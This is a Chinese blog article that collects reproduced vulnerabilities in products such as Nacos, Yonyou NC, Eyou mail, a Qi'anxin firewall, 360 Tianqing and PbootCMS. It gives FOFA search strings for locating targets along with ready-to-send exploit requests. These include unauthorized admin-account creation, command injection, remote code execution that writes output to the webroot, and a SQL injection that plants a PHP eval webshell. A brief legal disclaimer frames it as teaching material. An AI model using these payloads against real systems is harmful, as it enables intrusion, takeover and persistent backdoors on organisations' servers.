本文由 简悦 SimpRead 转码, 原文地址 mp.weixin.qq.com
推文开头,先学习一下中华人民共和国网络安全法,大家要做一名合法的白帽子,不要搞事情。
https://www.cto.ac.cn/thread-106.htm
本推文仅用于信息防御技术教学,切勿用于其他用途,有侵权或者存在危害性,请联系我进行删除。
这几天复现了几个漏洞,整理一下,公众号发一波
Alibaba Nacos 未授权访问漏洞
目前受影响的 Alibaba Nacos 版本:
Nacos <= 2.0.0-ALPHA.1
title="nacos"
http://x.x.x.x/nacos/v1/auth/users?pageNo=1&pageSize=100
发送下面的数据包,添加账号密码都是 qwe 的用户
POST /nacos/v1/auth/users HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
Connection: close
username=qwe&password=qwe
回到未授权暴露账号密码的接口处,可以发现 qwe 用户添加成功
最后登录成功
齐治堡垒机任意用户登录
app="齐治科技-堡垒机"
poc
https://x.x.x.x/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm
用友 NC 目录遍历漏洞
app="用友-UFIDA-NC"
poc
http://x.x.x.x/NCFindWeb?service=IPreAlertConfigService&filename
亿邮电子邮件系统存在远程命令执行漏洞
app="亿邮电子邮件系统"
poc
POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 12
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
type='|id||'
这里我是写的 xray 自定义 poc 跑的,方便复现
奇安信 NS-NGFW 网康防火墙 前台 RCE
网康下一代防火墙
poc
POST /directdata/direct/router HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0
Content-Length: 265
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
{
"action": "SSLVPN_Resource",
"method": "deleteImage",
"data": [
{
"data": [
"/var/www/html/d.txt;id > /var/www/html/1.txt"
]
}
],
"type": "rpc",
"tid": 17
}
放包,执行 id 命令,并将结果输出到网站根目录下的 1.txt 中
然后访问根目录下的 1.txt 文件
360 天擎_越权访问
app="360天擎私有云杀毒管理V6.0系统"
app="360天擎终端安全管理系统"
https://x.x.x.x/api/dbstat/gettablessize
天擎_前台 sql 注入
fofa
app="360天擎私有云杀毒管理V6.0系统"
app="360天擎终端安全管理系统"
poc
/api/dp/rptsvcsyncpoint?ccid=1';create table O(T TEXT);insert into O(T) values('<?php @eval($_POST[1]);?>');copy O(T) to 'C:\Program Files (x86)\360\skylar6\www\1.php';drop table O;--
这里我是用 sqlmap 验证的
fofa
app="PBOOTCMS"
这个是无意中逛 cnvd 看见的漏洞,并复现成功了
漏洞描述就告诉你注入点在哪了
本地环境搭建复现
数据库是 mysql
条件为假时,未查到任何数据
条件为真时,查询到数据
admin 超管账号存于 ay_user 表中
其中 admin 的十六进制值为 61646d696e
查看 ay_user 中 username=admin 的记录
1=select 1 from ay_user where username regexp 0x61646d696e
最后祝大家漏洞越挖越多
END
有问题随时私聊
微信号:jiangdaren000
(欢迎各位师傅加好友探讨)